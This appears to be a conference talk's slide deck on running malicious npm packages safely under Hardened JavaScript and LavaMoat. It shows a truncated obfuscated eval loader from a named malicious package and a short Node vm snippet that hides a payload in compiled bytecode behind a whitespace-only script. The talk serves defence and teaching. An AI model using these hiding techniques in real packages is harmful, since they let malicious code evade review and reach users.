Watch me run malware from npm

@naugtur, JSNation US 2024

Who's that guy?

https://naugtur.pl

[![](CliffordStoll_2006-embed.jpg)](https://www.ted.com/talks/clifford_stoll_the_call_to_learn?utm_campaign=tedspread&utm_medium=referral&utm_source=tedcomshare) It's going to be a bit like this TED talk by Clifford Stoll

_{^{Put your malicious code in a package and people will gobble it up like cookies.}}

## But I promised malware

---
       
          ### Where do I get malware when I actually want to?
          - [npmjs.com/package/object-color](https://www.npmjs.com/package/object-color) ⛔
          - [socket.dev/npm/package/object-color](https://socket.dev/npm/package/object-color) ✔️
          
          ---
          ### Did I mention it's obfuscated?

```js
              eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c+'\\b','g'),k[c])}}return p}('63 25=[
              "\\17\\19\\39\\13\\16\\46\\24\\22\\7\\9\\8\\7\\9\\15\\7\\15\\16\\7\\9\\14\\7\\9\\17\\7\\15\\8\\7\\13\\15\\7\\13\\13\\
            ```

Not a problem for Hardened Javascript

---

# 🤡
          Watch me run actual malware!

https://github.com/naugtur/lavalab

---

#### why stop at obfuscation?

```js
          const vmsc = new vm.Script(code, {
            produceCachedData: true,
          });
          const cached = vmsc.createCachedData();
          ```

```js
          const rebuilt = new vm.Script(" ".repeat(1337), {
            cachedData: cached,
            filename: "a.js",
          });
          rebuilt.runInThisContext();

```
        #### compiled JS bytecode payloads!

🙈

BTW

Don't publish malware to NPM please

🛡️

Defenses

^{The kind we're not going to talk about}

Hello, we've found a malicious package version in your dependencies that…
you've been shipping to production for a month.
- npm audit

This new package looks odd. Got time to read it?
- socket.dev

#### You've witnessed ## malicious code #### being controlled ## at runtime ## 💪 with the power of Hardened Javascript and LavaMoat --- ![hardened js](./hardenedjs.svg) ## Hardened Javascript https://hardenedjs.org/ --- ## 🤯 ### JS design is good for security? - Take ECMA + W3C - Add Conway's Law - Separation between language and APIs - Power only reachable through scope - Hardened Javascript controls scope --- ### SES-shim > Implementation of Hardened Javascript while we wait for it to be standardized. - `Compartment` - scope isolation - `lockdown` - makes your globals secure --- ### `lockdown` #### prevents prototype poisoning ```js Object.freeze(Object.prototype) // and stuff like that ``` --- ![lavamoat](./lavamoat-logo.png) #### Part of your tech stack to make runtime secure --- ## LavaMoat Uses SES-shim to protect app code from malicious dependencies. --- ### What does LavaMoat do? - Each 📦package gets put in its own compartment - Each compartment only has the globals that are allowed by policy - The dependency structure still works and is running in the same process/thread/window - Tooling helps you create and manage the policy --- ### I could tell you, but I'd rather show you # 🍪 more demo --- ### LavaMoat Webpack Plugin will reach 1.0 soon 🎉 --- ### There's more to LavaMoat

Visit https://lavamoat.github.io to explore all the tools and features. --- ## BTW ### You should start with #### `@lavamoat/allow-scripts`

Setting it up will take 5 minutes and eliminate the attack vectors most malicious packages use.

I'll help you set up LavaMoat in your project

@naugtur naugtur.pl

naugtur.pl/training